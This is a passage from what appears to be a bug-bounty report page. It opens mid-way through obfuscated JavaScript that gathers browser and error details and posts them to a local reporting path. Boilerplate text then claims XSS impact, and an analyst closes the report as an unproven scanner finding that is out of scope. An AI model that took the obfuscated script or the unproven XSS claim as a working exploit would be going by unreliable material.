8375[_0x4132('0xe')]=_0x2de96e[_0x4132('0x14')];_0x1f8375[_0x4132('0x0')]=_0x2de96e
[_0x4132('0x12')];var _0x4c322b=_0x1f8375;if(_0x2de96e['fUBCJ']
(_0x4132('0x18'),_0x4132('0x18'))){var
_0x1dd331={};_0x1dd331['ua']=navigator[_0x4132('0x3a')];_0x1dd331[_0x4132('0x1f')]=
location[_0x4132('0x1f')];_0x1dd331[_0x4132('0x35')]=_0x3f6e60[_0x4132('0x32')];_0x
1dd331['stack']=_0x3f6e60['stack'];_0x1dd331['hn']=_0xf1aa4c;_0x1dd331['hv']=_0x15b
95d;_0x1dd331[_0x4132('0x9')]=_0x21f58d;_0x4c322b[_0x4132('0x5a')](_0x423b31,
{'method':_0x4c322b[_0x4132('0x1a')],'url':_0x4c322b[_0x4132('0x4a')]
(_0x4c322b['JPgvy'](_0x4c322b[_0x4132('0x4a')](_0x4c322b[_0x4132('0x4a')]('/
a'+'pp'[0x0],_0x4132('0xa')),'ee'[0x0])
+_0x4c322b[_0x4132('0x23')],'/'[0x0]),_0x4c322b[_0x4132('0xe')])
+'o'[0x0]+'rt','headers':{'Content-
Type':_0x4c322b[_0x4132('0x0')]},'data':JSON[_0x4132('0x55')]
(_0x1dd331)});}else{location[_0x4132('0x2d')]();}}});})[_0x4132('0x8')]
(_0x2c0f57);}}catch(_0xac70d){if(_0x2de96e[_0x4132('0x26')]!=='gyusG')
{_0x2de96e[_0x4132('0x5c')](_0x2c0f57,_0xac70d);}else{location[_0x4132('0x2d')]
();}}}();</script></body></html>
Impact
If an attacker can control a script that is executed in the victim's browser, then
they can typically fully compromise that user. Amongst other things, the attacker
can: Perform any action within the application that the user can perform.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary
JavaScript into the application's response.
2 attachments:
F3229903: Screenshot_2024-04-28_213341.png
F3229904: Screenshot_2024-04-28_213404.png
h1_analyst_enzo

closed the report and changed the status to Not Applicable.

May 6, 2024, 8:15am UTC

Hi @geiuhg3495,
Thank you for all the efforts you put into writing this report, however, please
note that automated vulnerability scanners commonly have low priority issues and/or
false positives. Before submitting the results from a scanner, please take a moment
to confirm that the reported issues are valid and exploitable with business impact.
For any scenario to be accepted as a practical security vulnerability you need to
demonstrate the security issue along with a working proof-of-concept. Moreover,
please note DOM and Reflected XSS issues are OOS for this program.
Regards,
@h1_analyst_enzo